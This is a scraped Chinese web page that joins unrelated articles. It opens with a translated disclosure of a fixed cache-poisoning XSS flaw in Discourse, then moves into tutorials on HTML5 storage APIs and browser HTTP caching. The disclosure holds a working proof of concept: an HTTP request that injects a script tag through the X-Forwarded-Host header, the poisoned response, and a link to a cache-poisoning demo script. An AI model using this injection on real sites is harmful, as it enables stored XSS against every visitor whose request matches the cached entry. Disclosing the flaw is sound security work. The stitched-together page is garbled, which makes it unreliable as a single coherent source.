整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
洞源代碼:
https://github.com/discourse/discourse/blob/master/app/views/common/_special_font_face.html.erb#L12-L18
<% woff2_url="#{asset_path("fontawesome-webfont.woff2")}?#{font_domain}&v=4.7.0".html_safe %>
<link rel="preload" href="<%=woff2_url%>" as="font" type="font/woff2" crossorigin />
...
src: url('<%=woff2_url %>') format('woff2'),
HTTP Request
GET /?xx HTTP/1.1 Host: meta.discourse.org X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>
HTTP Response
<link rel="preload"
>
<script>alert(document.domain)</script>
&2&v=4.7.0" as="font" type="font/woff2" crossorigin />
<style>
[@font-face](/font-face) {
font-family: 'FontAwesome';
src: url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2?https://cacheattack'">
<script>alert(document.domain)</script>
&2&v=4.7.0') format('woff2'),
url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-ba0c59deb5450f5cb41b3f93609ee2d0d995415877ddfa223e8a8a7533474f07.woff?https://cacheattack'"><script>alert(document.domain)</script>&2&v=4.7.0') format('woff');
}
</style>
此外,應用程序緩存HTTP響應1分鐘,因此如果您發送帶有XSS有效負載的HTTP請求,它將被緩存,并在標頭匹配時顯示所有請求:
請求開始行,接受,接受編碼。
重現步驟
為了更簡單的演示,我寫了一個腳本。
該腳本從請求中獲取必要的標頭并中毒緩存。
您只需打開緩存頁面即可。
1)打開url
https://blackfan.ru/bugbounty/webcachedeception.php?url=https://meta.discourse.org/?cacheattack&payload=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cache=60
2)結果
網站的漏洞演示已經修復》》》》》》。
影響:攻擊者可以每分鐘收集Accep + Accept-Encoding的流行組合并中毒網頁緩存。
影響就像在任何頁面上存儲的XSS一樣。
言
本篇文章主要介紹了前端HTML5幾種存儲方式的總結 ,主要包括本地存儲localstorage,本地存儲sessionstorage,離線緩存(application cache),Web SQL,IndexedDB。有興趣的可以了解一下。
正文開始~
h5之前,存儲主要是用cookies。cookies缺點有在請求頭上帶著數據,大小是4k之內。主Domain污染。
主要應用:購物車、客戶登錄
對于IE瀏覽器有UserData,大小是64k,只有IE瀏覽器支持。
目標
存儲方式:
以鍵值對(Key-Value)的方式存儲,永久存儲,永不失效,除非手動刪除。
大小:
每個域名5M
支持情況:
注意:IE9 localStorage不支持本地文件,需要將項目署到服務器,才可以支持!
if(window.localStorage){
alert('This browser supports localStorage');
}else{
alert('This browser does NOT support localStorage');
}
常用的API:
getItem //取記錄
setIten//設置記錄
removeItem//移除記錄
key//取key所對應的值
clear//清除記錄
存儲的內容:
數組,圖片,json,樣式,腳本。。。(只要是能序列化成字符串的內容都可以存儲)
HTML5 的本地存儲 API 中的 localStorage 與 sessionStorage 在使用方法上是相同的,區別在于 sessionStorage 在關閉頁面后即被清空,而 localStorage 則會一直保存。
本地緩存應用所需的文件
使用方法:
①配置manifest文件
頁面上:
<!DOCTYPE HTML> <html manifest="demo.appcache"> ... </html>
Manifest 文件:
manifest 文件是簡單的文本文件,它告知瀏覽器被緩存的內容(以及不緩存的內容)。
manifest 文件可分為三個部分:
①CACHE MANIFEST - 在此標題下列出的文件將在首次下載后進行緩存
②NETWORK - 在此標題下列出的文件需要與服務器的連接,且不會被緩存
③FALLBACK - 在此標題下列出的文件規定當頁面無法訪問時的回退頁面(比如 404 頁面)
完整demo:
CACHE MANIFEST # 2016-07-24 v1.0.0 /theme.css /main.js NETWORK: login.jsp FALLBACK: /html/ /offline.html
服務器上:manifest文件需要配置正確的MIME-type,即 "text/cache-manifest"。
如Tomcat:
<mime-mapping> <extension>manifest</extension> <mime-type>text/cache-manifest</mime-type> </mime-mapping>
常用API:
核心是applicationCache對象,有個status屬性,表示應用緩存的當前狀態:
0(UNCACHED) : 無緩存, 即沒有與頁面相關的應用緩存
1(IDLE) : 閑置,即應用緩存未得到更新
2 (CHECKING) : 檢查中,即正在下載描述文件并檢查更新
3 (DOWNLOADING) : 下載中,即應用緩存正在下載描述文件中指定的資源
4 (UPDATEREADY) : 更新完成,所有資源都已下載完畢
5 (IDLE) : 廢棄,即應用緩存的描述文件已經不存在了,因此頁面無法再訪問應用緩存
相關的事件:
表示應用緩存狀態的改變:
checking : 在瀏覽器為應用緩存查找更新時觸發
error : 在檢查更新或下載資源期間發送錯誤時觸發
noupdate : 在檢查描述文件發現文件無變化時觸發
downloading : 在開始下載應用緩存資源時觸發
progress:在文件下載應用緩存的過程中持續不斷地下載地觸發
updateready : 在頁面新的應用緩存下載完畢觸發
cached : 在應用緩存完整可用時觸發
Application Cache的三個優勢:
① 離線瀏覽
② 提升頁面載入速度
③ 降低服務器壓力
注意事項:
1. 瀏覽器對緩存數據的容量限制可能不太一樣(某些瀏覽器設置的限制是每個站點 5MB)
2. 如果manifest文件,或者內部列舉的某一個文件不能正常下載,整個更新過程將視為失敗,瀏覽器繼續全部使用老的緩存
3. 引用manifest的html必須與manifest文件同源,在同一個域下
4. 瀏覽器會自動緩存引用manifest文件的HTML文件,這就導致如果改了HTML內容,也需要更新版本才能做到更新。
5. manifest文件中CACHE則與NETWORK,FALLBACK的位置順序沒有關系,如果是隱式聲明需要在最前面
6. FALLBACK中的資源必須和manifest文件同源
7. 更新完版本后,必須刷新一次才會啟動新版本(會出現重刷一次頁面的情況),需要添加監聽版本事件。
8. 站點中的其他頁面即使沒有設置manifest屬性,請求的資源如果在緩存中也從緩存中訪問
9. 當manifest文件發生改變時,資源請求本身也會觸發更新
離線緩存與傳統瀏覽器緩存區別:
1. 離線緩存是針對整個應用,瀏覽器緩存是單個文件
2. 離線緩存斷網了還是可以打開頁面,瀏覽器緩存不行
3. 離線緩存可以主動通知瀏覽器更新資源
關系數據庫,通過SQL語句訪問
Web SQL 數據庫 API 并不是 HTML5 規范的一部分,但是它是一個獨立的規范,引入了一組使用 SQL 操作客戶端數據庫的 APIs。
支持情況:
Web SQL 數據庫可以在最新版的 Safari, Chrome 和 Opera 瀏覽器中工作。
核心方法:
①openDatabase:這個方法使用現有的數據庫或者新建的數據庫創建一個數據庫對象。
②transaction:這個方法讓我們能夠控制一個事務,以及基于這種情況執行提交或者回滾。
③executeSql:這個方法用于執行實際的 SQL 查詢。
打開數據庫:
var db=openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024,fn);
//openDatabase() 方法對應的五個參數分別為:數據庫名稱、版本號、描述文本、數據庫大小、創建回調
執行查詢操作:
var db=openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024);
db.transaction(function (tx) {
tx.executeSql('CREATE TABLE IF NOT EXISTS WIN (id unique, name)');
});
插入數據:
var db=openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024);
db.transaction(function (tx) {
tx.executeSql('CREATE TABLE IF NOT EXISTS WIN (id unique, name)');
tx.executeSql('INSERT INTO WIN (id, name) VALUES (1, "winty")');
tx.executeSql('INSERT INTO WIN (id, name) VALUES (2, "LuckyWinty")');
});
讀取數據:
db.transaction(function (tx) {
tx.executeSql('SELECT * FROM WIN', [], function (tx, results) {
var len=results.rows.length, i;
msg="<p>查詢記錄條數: " + len + "</p>";
document.querySelector('#status').innerHTML +=msg;
for (i=0; i < len; i++){
alert(results.rows.item(i).name );
}
}, null);
});
由這些操作可以看出,基本上都是用SQL語句進行數據庫的相關操作,如果你會MySQL的話,這個應該比較容易用。
索引數據庫 (IndexedDB) API(作為 HTML5 的一部分)對創建具有豐富本地存儲數據的數據密集型的離線 HTML5 Web 應用程序很有用。同時它還有助于本地緩存數據,使傳統在線 Web 應用程序(比如移動 Web 應用程序)能夠更快地運行和響應。
異步API:
在IndexedDB大部分操作并不是我們常用的調用方法,返回結果的模式,而是請求——響應的模式,比如打開數據庫的操作
這樣,我們打開數據庫的時候,實質上返回了一個DB對象,而這個對象就在result中。由上圖可以看出,除了result之外。還有幾個重要的屬性就是onerror、onsuccess、onupgradeneeded(我們請求打開的數據庫的版本號和已經存在的數據庫版本號不一致的時候調用)。這就類似于我們的ajax請求那樣。我們發起了這個請求之后并不能確定它什么時候才請求成功,所以需要在回調中處理一些邏輯。
關閉與刪除:
function closeDB(db){
db.close();
}
function deleteDB(name){
indexedDB.deleteDatabase(name);
}
數據存儲:
indexedDB中沒有表的概念,而是objectStore,一個數據庫中可以包含多個objectStore,objectStore是一個靈活的數據結構,可以存放多種類型數據。也就是說一個objectStore相當于一張表,里面存儲的每條數據和一個鍵相關聯。
我們可以使用每條記錄中的某個指定字段作為鍵值(keyPath),也可以使用自動生成的遞增數字作為鍵值(keyGenerator),也可以不指定。選擇鍵的類型不同,objectStore可以存儲的數據結構也有差異。
學習從來不是一個人的事情,要有個相互監督的伙伴,想要學習或交流前端問題的小伙伴可以私信“學習”小明獲取web前端入門資料,一起學習,一起成長!
端緩存指的是,瀏覽器對服務器最近請求過的資源進行存儲,通過這種方式來達到減少與服務器的交互請求,以此減少對帶寬流量的浪費,以及減少了服務器的負擔,而瀏覽器緩存主要分為兩種,強緩存和協商緩存
強緩存所謂的“強”,在于強制讓瀏覽器按照一定時間范圍內來存儲來自服務器的資源,有點強制的味道~,強緩存是利用Expires或者Cache-Control,不發送請求,直接從緩存中取,請求狀態碼會返回200(from cache)
Expires是HTTP/1.0中提及的,讓服務器為文件資源設置一個過期時間,在多長時間內可以將這些內容視為最新的,允許客戶端在這個時間之前不去檢查,MDN 具體介紹 點此
指定緩存到期GMT的絕對時間,如果expires到期需要重新請求
Expires:Sat, 09 Jun 2020 08:13:56 GMT
相比上一小節講的 expires,兩者有什么區別呢? Cache-Control 你可以理解成為高級版expires,為了彌補Expires的缺陷在Http1.1協議引入的,且強大之外優先級也更高,也就是當Expires和Cache-Control同時存在時,Cache-Control 會覆蓋Expires的配置,即Cache-Control ( Http 1.1 ) > Expires ( Http 1.0 )
Cache-Control 比Expires比較要內涵,具備更多的屬性,其中包括如下
? no-cache :可以在本地緩存,可以在代理服務器緩存,需要先驗證才可使用緩存
? no-store : 禁止瀏覽器緩存,只能通過服務器獲取
? max-age : 設置資源的過期時間(效果與expires一樣)
例子演示:
// 設置緩存時間為1年
Cache-Control: max-age=31536000
Expires:Sat, 09 Jun 2020 08:13:56 GMT //同時設置兩個,Expires會失效
則意味著瀏覽器可以緩存一年的時間,無需請求服務器,同時如果同時聲明Expires和Cache-Control,Expires將失效
?你可能會有疑惑Cache-Control no-cache與max-age=0有什么區別?
本質上就是你按瀏覽器刷新與強制刷新的區分,看下一節
相信你離不開的操作就是F5(刷新按鈕),但是不同的刷新操作意味著不同的反應
? Ctrl + F5 (強制刷新)::request header多了cache-control: no-cache (重新獲取請求)
? F5 (刷新)/ctrl+R刷新::request header多了 cache-control: max-age=0 (需要先驗證才可使用緩存,Expires無效)
協商緩存,就沒有強緩存那么霸道,協商緩存需要客戶端和服務端兩端進行交互,通過服務器告知瀏覽器緩存是否可用,并增加緩存標識,“有事好好商量”,兩者都會互相協商。 協商緩存,其實就是服務器與瀏覽器交互過程,一般有兩個回合,而協商主要有以下幾種方式:
? 第一回合:當瀏覽器第一次請求服務器資源時,服務器通過Last-Modified 來設置響應頭的緩存標識,把資源最后修改的時間作為值寫入,再將資源返回給瀏覽器
? 第二回合:第二次請求時,瀏覽器會帶上 If-Modified-Since 請求頭去訪問服務器,服務器將 If-Modified-Since 中攜帶的時間與資源修改的時間對比,當時間不一致時,意味更新了,服務器會返回新資源并更新Last-Modified,當時間一致時,意味著資源沒有更新,服務器會返回304狀態碼,瀏覽器將從緩存中讀取資源
//response header 第一回合
Last-Modified: Wed, 21 Oct 2019 07:28:00 GMT
//request header 第二回合
If-Modified-Since: Wed, 21 Oct 2019 07:29:00 GMT
MDN中提到ETag 之間的比較使用的是強比較算法,即只有在每一個字節都相同的情況下,才可以認為兩個文件是相同的,而這個hash值,是由對文件的索引節、大小和最后修改時間進行Hash后得到的,而且要注意的是分布式系統不適用,了解更多點我
? 第一回合: 也是跟上文一樣,瀏覽器去請求服務器資源,不過這次不是通過Last-Modified了,而是用Etag來設置響應頭緩存標識。Etag是由服務端生成的,然后瀏覽器會將Etag與資源緩存
? 第二回合: 瀏覽器會將 Etag 放入 If-None-Match 請求頭中去訪問服務器,服務器收到后,會對比兩端的標識,當兩者不一致時,意味著資源更新,服務器會返回新資源并更新Etag,瀏覽器將從緩存中讀取資源,當兩者一致時,意味著資源沒有更新,服務器會返回304狀態碼,瀏覽器將從緩存中讀取資源
//response header 第一回合
ETag: "33a64df551425fcc55e4d42a148795d9f25f89d4"
//request header 第二回合
If-None-Match: "33a64df551425fcc55e4d42a148795d9f25f89d4"
對比完 Last-Modified 與 Etag,我們可以很顯然看到,協商緩存每次請求都會與服務器發生“關系”,第一回合都是拿數據和標識,而第二回合就是瀏覽器“咨詢”服務器是否資源已經更新的過程。
同時,如果以上兩種方式同時使用,Etag 優先級會更高,即
Etag( Http 1.1 ) > Last-Modified ( Http 1.0 )
這是瀏覽器沒有跟服務器確認,直接用了瀏覽器緩存,性能最好的,沒有網絡請求,那么什么情況會出現這種情況?一般在expires或者 Cache-Control 中的max-age頭部有效時會發生
是瀏覽器和服務器“交流”了,確定使用緩存后,再用緩存,也就是第二節講的通過Etag或Last-Modified的第二回合中對比,對比兩者一致,則意味資源不更新,則服務器返回304狀態碼
以上兩種緩存全都失敗,也就是未緩存或者緩存未過期,需要瀏覽器去獲取最新的資源,效率最低 一句話:緩存是否過期用:Cache-Control(max-age), Expires,緩存是否有效用:Last-Modified,Etag
講述緩存在我們開發中最常見的使用
? keepAlive
vue官方文檔提到,當在這些組件之間切換的時候,你有時會想保持這些組件的狀態,以避免反復重渲染導致的性能問題,這個時候我們希望那些標簽的組件實例能夠被在它們第一次被創建的時候緩存下來,我們可以用一個 元素將其動態組件包裹起來 官方文檔
主要用于保留組件狀態或避免重新渲染,也意味著不會再走mounted,beforeDestroy函數,組件將被緩存,不用銷毀重新渲染,性能比較好
路由的選擇性緩存
// router.js
export default new Router({
routes:[
{ path: '/test',
name: 'test',
component: ()=> import('@/views/test/test.vue'),
meta: {
title: '測試',
keepAlive: true
}
},
// App.vue
<keep-alive v-if='$route.meta.keepAlive'>
<router-view></router-view>
</keep-alive>
<router-view v-if='!$route.meta.keepAlive'></router-view>
組件緩存
<keep-alive>
<component v-bind:is="currentTabComponent"></component>
</keep-alive>
前端工程化開發,可以使用 Webpack 編譯,打包的資源文件路徑里自動帶有一串隨機字符串,稱為 hash
在vue cli腳手架中,我們可以通過配置vue.config.js(本質上是配置webpack)來設置編譯生成的文件具備hash值,意味著每次打包編譯的文件都是唯一的,來防止因為緩存,導致資源沒有更新。
Vue-Cli 3x版本
// vue.config.js
module.exports={
filenameHashing: true,
chainWebpack: (config)=> {
config.output.filename('[name].[hash].js').end();
}
}
? 配置expires
假設我想通過web應用的圖片緩存一周,那你可以在nginx中配置如下,配置完之后一周之內的資源只會訪問瀏覽器的資源,而不是去請求Nginx
location ~ \.(gif|jpg|jpeg|png)$ {
root /var/mywww/html/public/
expires 7d; //表示把數據緩存7天,d:天,s:秒,m:分
}
location ~ \.(gif|jpg|jpeg|png)$ {
root /var/mywww/html/public/
etagoff; // 默認是開啟 on
}
掘金@樹醬
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
